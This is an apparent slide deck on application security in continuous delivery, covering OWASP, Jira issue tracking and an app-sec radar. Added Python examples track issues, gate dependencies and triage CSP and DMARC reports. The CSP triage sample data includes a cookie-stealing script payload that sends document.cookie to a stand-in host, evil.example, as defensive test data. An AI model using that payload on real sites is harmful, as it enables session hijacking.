Security in a Continuous Delivery World

Sherif Mansour

Upload: dinis-cruz

Post on 10-Jan-2017

Category: Technology

“Give me six hours to chop down a tree and I will spend the first four sharpening the axe.”

-Abraham Lincoln

Two things about Automation

1. Automation applied to an efficient operation will magnify its efficiency.

2. Automation applied to an inefficient operation will magnify its inefficiency.

-Bill Gates

Two things about Web Programming

1. Control-C

2. Control-V

Two Things About World Conquest

1. Divide and Conquer.

2. Never invade Russia in the winter.

Two Things About Information Security

Complete:

1.

2.

Overview

• Timeline - 1986

• Agile Security

• Bug Tracker

• Definition of Done

• App Sec Radar

• Continuous Delivery

• Security Testing

• How OWASP can help

Timeline - 1986

• HBR publishes an article: “The New New Product Development Game”

• Computer Fraud and Abuse Act

The New New Product Development Game

Leading companies show six characteristics in managing their new product development processes:

1. Built-in instability

2. Self-organizing project teams

3. Overlapping development phases

4. “Multilearning”

5. Subtle control

6. Organizational transfer of learning

Agile Frameworks

• XP • Scrum • Crystal • FDD • Lean and Kanban • DSDM

Computer Fraud and Abuse Act

• Enacted in 1986 • First Felony in 1988 - Morris Worm • Mr. Robert Morris Sr. (his father) was the

Chief Scientist at NSA • Comm-Sec & Compu-Sec merged Info-

Sec • CERT was created in CMU

Since Then It's Been an Arms Race

Stop me if you have seen this before: applying controls without understanding their limitations.

Fast Forward to 2001

1. OWASP was formed :-)

2. Agile Manifesto was published :-) :-)

OWASP

• OWASP Top Ten

• OWASP Software Assurance Maturity Model

• OWASP Development Guide

• OWASP ZAP Project: The Zed Attack Proxy (ZAP)

Agile Manifesto

• Individuals and Interactions over processes and tools

• Working software over comprehensive documentation

• Customer collaboration over contract negotiation

• Responding to change over following a plan

Agile Principles

Agile (scrum) Framework

Security in an Agile Framework

• Communicate security recommendations simply and clearly

• Identify the biggest risks and which ones your teams are exposed to

• When you raise a security issue, make it:

  • Unique - no duplicates

  • Useful - improves the security and quality of the software

  • Actionable - all necessary information is in the ticket

App Sec Issues Tracking and Metrics

For every security issue detected, raise a Jira bug ticket and include the following attributes on the bug type:

1. Business risk

2. Attack vector

3. Priority

4. Components

5. Testing method

6. Dev team

Metrics
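The ticket rules above (unique, useful, actionable), the six bug attributes and the metrics slide fit together as one small piece of tooling. The following is an added example, not code from the talk or from any OWASP project: a tracker that refuses tickets missing any of the six attributes, fingerprints findings so a re-scan does not open a second ticket for the same weakness, and rolls the open tickets up by team, business risk and testing method. The field names, the fingerprint scheme (attack vector + components + location), the risk scale and the sample findings are all assumptions or constructed data.

```python
# Added example (not from the talk): a minimal tracker that enforces the
# Unique / Useful / Actionable rules and the six Jira attributes from the
# slides, then rolls them up into metrics. Field names, the fingerprint
# scheme and the sample findings are assumptions / constructed data.
from collections import Counter
from dataclasses import dataclass
import hashlib

# The six attributes the slide puts on the bug type; all must be filled.
REQUIRED = ("business_risk", "attack_vector", "priority", "components",
            "testing_method", "dev_team")
RISK_LEVELS = ("critical", "high", "medium", "low")   # assumed scale


@dataclass(frozen=True)
class SecurityIssue:
    title: str
    business_risk: str
    attack_vector: str      # e.g. XSS, SQLi, SSRF
    priority: str
    components: tuple       # affected components
    testing_method: str     # SAST, DAST, pentest, code review ...
    dev_team: str           # team that owns the fix
    location: str           # file:line or URL; part of the dedup key

    def fingerprint(self) -> str:
        # "Unique": the same weakness at the same place is one ticket, however
        # many scans rediscover it. Title and priority are deliberately left
        # out of the key so re-labelling does not create duplicates.
        key = "|".join((self.attack_vector.lower(),
                        ",".join(sorted(c.lower() for c in self.components)),
                        self.location))
        return hashlib.sha256(key.encode()).hexdigest()[:16]


def validate(issue: SecurityIssue) -> list:
    """'Actionable': return the attributes that are missing or invalid."""
    problems = [f for f in REQUIRED if not getattr(issue, f)]
    if issue.business_risk and issue.business_risk.lower() not in RISK_LEVELS:
        problems.append("business_risk:unknown-level")
    return problems


class IssueTracker:
    def __init__(self):
        self.tickets = {}   # fingerprint -> SecurityIssue

    def raise_ticket(self, issue: SecurityIssue):
        """Return (created, fingerprint); refuse incomplete issues outright."""
        problems = validate(issue)
        if problems:
            raise ValueError(f"not actionable, missing/invalid: {problems}")
        fp = issue.fingerprint()
        if fp in self.tickets:
            return False, fp          # duplicate: do not raise a second ticket
        self.tickets[fp] = issue
        return True, fp

    def metrics(self) -> dict:
        """The roll-ups the 'Metrics' slide asks for, per team/risk/method."""
        issues = list(self.tickets.values())
        return {
            "open": len(issues),
            "by_team": dict(Counter(i.dev_team for i in issues)),
            "by_risk": dict(Counter(i.business_risk.lower() for i in issues)),
            "by_method": dict(Counter(i.testing_method for i in issues)),
        }


# Constructed sample scanner output (not real findings).
SAMPLE_FINDINGS = [
    SecurityIssue("Reflected XSS in cart page", "high", "XSS", "P2",
                  ("web", "checkout"), "SAST", "team-checkout",
                  "templates/cart.html:42"),
    SecurityIssue("Reflected XSS in cart page", "High", "xss", "P1",
                  ("checkout", "web"), "SAST", "team-checkout",
                  "templates/cart.html:42"),      # same weakness, re-scanned
    SecurityIssue("SQL injection in search API", "critical", "SQLi", "P1",
                  ("api",), "DAST", "team-platform", "/api/search?q="),
]


def demo():
    """Feed the samples through the tracker; returns (created flags, metrics)."""
    tracker = IssueTracker()
    created = [tracker.raise_ticket(f)[0] for f in SAMPLE_FINDINGS]
    return created, tracker.metrics()


if __name__ == "__main__":
    print(demo())
```

The fingerprint is the part worth arguing about with your team: key it on what makes a finding the same finding (vector, component, location), never on free text, or every rename of a ticket title spawns a duplicate and the "by team" numbers stop meaning anything.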

App-Sec Radar

The Application Security Radar is a site that informs the technology teams about the security technologies they should embrace or move away from.

This ensures developers adopt more secure technologies. There are six recommendation categories on the app-sec radar:

• Plan for Removal

• No New Use

• Evaluate

• Trial

• Adopt

• Hold
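A radar only changes what gets shipped if the pipeline reads it. The following is an added example of that, not code from the talk or from any radar implementation: a CI gate that parses a requirements file, looks each dependency up on the radar and blocks the change when it pulls in a "Plan for Removal" technology or newly introduces a "No New Use" one, while "Evaluate", "Hold" and unlisted technologies only warn. Only the six ring names come from the slide; the radar entries, the requirements text and the "existing dependencies" set are constructed, and treating "No New Use" as blocking only new introductions is this example's assumption.

```python
# Added example (not from the talk): a CI gate that reads the app-sec radar
# and fails a change that introduces technology the radar says to avoid.
# The radar entries, the "existing" dependency set and the requirements
# text below are constructed; only the six ring names come from the slide.
import re

# Constructed radar: technology -> (ring, guidance). Real entries would be
# published on the radar site and fetched, not hard-coded.
RADAR = {
    "requests":     ("Adopt", ""),
    "pyjwt":        ("Adopt", ""),
    "cryptography": ("Adopt", ""),
    "pycrypto":     ("No New Use", "unmaintained; use 'cryptography' instead"),
    "legacylib":    ("Plan for Removal", "migrate to 'newlib' by end of quarter"),
    "somenewlib":   ("Evaluate", "under app-sec review; ask before adopting"),
    "trialfw":      ("Trial", "pilot teams only"),
}
UNLISTED = ("Unlisted", "not on the radar; ask app-sec to rate it")

_REQ_LINE = re.compile(r"([A-Za-z0-9_.\-]+)\s*(?:[=<>!~]+\s*([^\s;#]+))?")


def parse_requirements(text):
    """Yield (name, version_spec_or_None) from requirements.txt-style text."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("-"):       # skip options like -r, -e
            continue
        m = _REQ_LINE.match(line)
        if m:
            yield m.group(1).lower(), m.group(2)


def check_dependencies(requirements_text, existing=frozenset()):
    """Return (blocking, warnings) lists of (name, ring, guidance).

    'Plan for Removal' always blocks: the codebase must shed it.
    'No New Use' blocks only new introductions, i.e. names not already in
    `existing` (the dependency set of the target branch).
    'Evaluate', 'Hold' and unlisted technologies warn but do not block;
    'Trial' and 'Adopt' pass silently.
    """
    blocking, warnings = [], []
    for name, _spec in parse_requirements(requirements_text):
        ring, guidance = RADAR.get(name, UNLISTED)
        if ring == "Plan for Removal" or (ring == "No New Use" and name not in existing):
            blocking.append((name, ring, guidance))
        elif ring in ("Evaluate", "Hold", "Unlisted"):
            warnings.append((name, ring, guidance))
    return blocking, warnings


def gate(requirements_text, existing=frozenset()):
    """True when the build may proceed (no blocking findings)."""
    blocking, _ = check_dependencies(requirements_text, existing)
    return not blocking


# Constructed sample requirements file for a change under review.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
pycrypto==2.6.1        # legacy crypto helper
legacylib<2
somenewlib>=1.0
pyjwt
"""

if __name__ == "__main__":
    print(check_dependencies(SAMPLE_REQUIREMENTS))
    print(check_dependencies(SAMPLE_REQUIREMENTS, existing={"pycrypto"}))
```

Passing the target branch's current dependency set as `existing` is what makes "No New Use" enforceable without breaking every build that still carries the old library; "Plan for Removal" is the ring where that grace period has ended.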

DoD - Definition of Done

• The Definition of Done should include a quick reference checklist for developers: what to avoid, and what to look out for during code review.

Continuous Delivery

You’re doing continuous delivery when:

• Your software is deployable throughout its lifecycle

• Your team prioritises keeping the software deployable over working on new features

• Anybody can get fast, automated feedback on the production readiness of their systems any time somebody makes a change to them

• You can perform push-button deployments of any version of the software to any environment on demand

Release Vehicle vs. Pipeline

Testing in Continuous Delivery

How OWASP Can Help

• If you solve a problem and I solve a problem, each of us has two solutions.

• Guidance

• Security Libraries

• Developer tools

• Training

• etc.

Thank you

Two More things :-)

Interests

• Headers reporting back:

  • Content Security Policy (CSP)

  • HTTP Public Key Pinning (HPKP)

• DMARC (email standard)
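What these mechanisms have in common is that they report back: CSP's report-uri delivers violation reports to an endpoint you run, and a DMARC record's rua= tag names where receivers send aggregate reports. The following is an added example, not code from the talk: a receiver-side normaliser and triage for CSP violation reports, plus a DMARC record check that flags a policy which neither enforces nor reports. The sample reports, the script host allowlist and the triage labels are constructed or assumed. HPKP is left out deliberately: since this talk was given, the major browsers have removed HPKP support, so there is no longer anything for it to report.

```python
# Added example (not from the talk): handling what CSP and DMARC "report
# back". A CSP report-uri receiver gets JSON like the constructed samples
# below; a DMARC record lives in a DNS TXT record. The host allowlist,
# sample reports and triage labels are assumptions.
import json
from urllib.parse import urlparse

EXTENSION_SCHEMES = ("chrome-extension", "moz-extension", "safari-extension",
                     "ms-browser-extension")


def parse_csp_report(body: str):
    """Normalise the JSON a browser POSTs to report-uri; None if malformed."""
    try:
        r = json.loads(body)["csp-report"]
    except (ValueError, KeyError, TypeError):
        return None
    blocked = r.get("blocked-uri", "") or ""
    # Older browsers send only violated-directive ("script-src 'self' ...").
    directive = r.get("effective-directive") or r.get("violated-directive", "")
    host = urlparse(blocked).hostname if "://" in blocked else blocked
    return {
        "page": r.get("document-uri", ""),
        "directive": directive.split()[0] if directive else "",
        "blocked": blocked,
        "blocked_host": host or "",
        # "inline"/"eval"/"" mean script in the page itself, not a remote URL
        "inline": blocked in ("inline", "eval", ""),
        "sample": r.get("script-sample", ""),
    }


def triage_csp(rep, allowed_script_hosts):
    """Label a normalised report so the noise does not bury the signal."""
    if rep is None:
        return "malformed"
    if rep["blocked"].split(":", 1)[0] in EXTENSION_SCHEMES:
        return "extension-noise"          # user's browser add-ons, not your site
    if rep["directive"] == "script-src":
        if rep["inline"]:
            return "inline-script"        # your own inline JS or an injection
        if rep["blocked_host"] not in allowed_script_hosts:
            return "unexpected-script-host"   # the one worth paging on
    return "other"


def parse_dmarc(txt: str) -> dict:
    """Split 'v=DMARC1; p=reject; rua=...' into a tag dict."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def assess_dmarc(txt: str):
    """Return (tags, issues): does this record both enforce and report back?"""
    t = parse_dmarc(txt)
    issues = []
    if t.get("v") != "DMARC1":
        issues.append("missing v=DMARC1")
    p = t.get("p")
    if p not in ("none", "quarantine", "reject"):
        issues.append("invalid or missing p=")
    elif p == "none":
        issues.append("p=none only monitors; spoofed mail is still delivered")
    if not t.get("rua"):
        issues.append("no rua= address: aggregate reports have nowhere to go")
    if t.get("pct", "100") != "100":
        issues.append("pct=%s: policy applied to only part of the mail" % t["pct"])
    return t, issues


# Constructed sample CSP reports (not captured from a real browser).
SAMPLE_CSP_REPORT = json.dumps({"csp-report": {
    "document-uri": "https://shop.example/checkout",
    "violated-directive": "script-src 'self' https://cdn.example",
    "effective-directive": "script-src",
    "blocked-uri": "https://evil.example/keylogger.js",
}})
SAMPLE_INLINE_REPORT = json.dumps({"csp-report": {
    "document-uri": "https://shop.example/",
    "effective-directive": "script-src",
    "blocked-uri": "inline",
    "script-sample": "document.location='https://evil.example/?c='+document.cookie",
}})
SAMPLE_EXT_REPORT = json.dumps({"csp-report": {
    "effective-directive": "script-src",
    "blocked-uri": "chrome-extension://abcdefghijklmnop/inject.js",
}})
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}    # assumed allowlist

if __name__ == "__main__":
    for body in (SAMPLE_CSP_REPORT, SAMPLE_INLINE_REPORT, SAMPLE_EXT_REPORT):
        print(triage_csp(parse_csp_report(body), ALLOWED_SCRIPT_HOSTS))
    print(assess_dmarc("v=DMARC1; p=none; rua=mailto:dmarc@shop.example"))
```

The triage order matters in practice: browser extensions generate most CSP reports on a busy site, and inline violations are ambiguous until the policy moves to nonces or hashes, so an unexpected remote host in script-src is the report that deserves an alert rather than a dashboard.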

Please Welcome Simon Bennetts